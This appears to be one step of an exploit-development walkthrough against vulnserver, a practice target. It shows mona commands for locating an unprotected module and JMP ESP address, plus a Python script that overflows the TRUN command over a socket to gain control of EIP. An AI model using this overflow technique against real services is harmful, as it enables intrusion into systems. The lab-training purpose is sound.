Finding the Right Module: After bad characters, we have to find the right module. We're looking for a DLL or something similar inside of a program that has no memory protections meaning no DEP, no ASLR, no SEH, etc.
Run the vulnserver and Immunity Debugger, type:
!mona modules
We can notice that there is no protection on the first column "False". We going to use "FFE4" this as a pointer. So, the pointer is going to jump to our malicious shell code.
Then, go back to the immunity debugger, and find the return address. "625011af".
Find the module by:
!mona jmp -r ESP -m "essfunc.dll" > Enter
We have to create other python script and send the shellcode to the jump point and break.
5-module.py
//python3 5-module.py
#!/usr/bin/python3
import sys, socket
from time import sleep
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
shellcode = "A" * 2003 + "B" * 4 + badchars
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
//Change This IP address and Port
s.connect(('192.168.4.104',9999))
payload = "TRUN /.:/" + shellcode
s.send((payload.encode()))
s.close()
except:
print ("Error connecting to server")
sys.exit()
Then, go back to the immunity debugger and find our jump code. This is the exactly what we want. Then we're going to hit F2 to set the break point.
You noticed that there is a blue color on that break point. We have the break point running, this mean we're going to overflow the buffer but if we hit this specific spot this jump code, it is not going to jump to further instruction.
It's actually going to break the program and paused right here for further instruction from us.
Then, execute the script. We have seen breakpoint at FFE4 and the program is paused. That's mean we control this EIP .
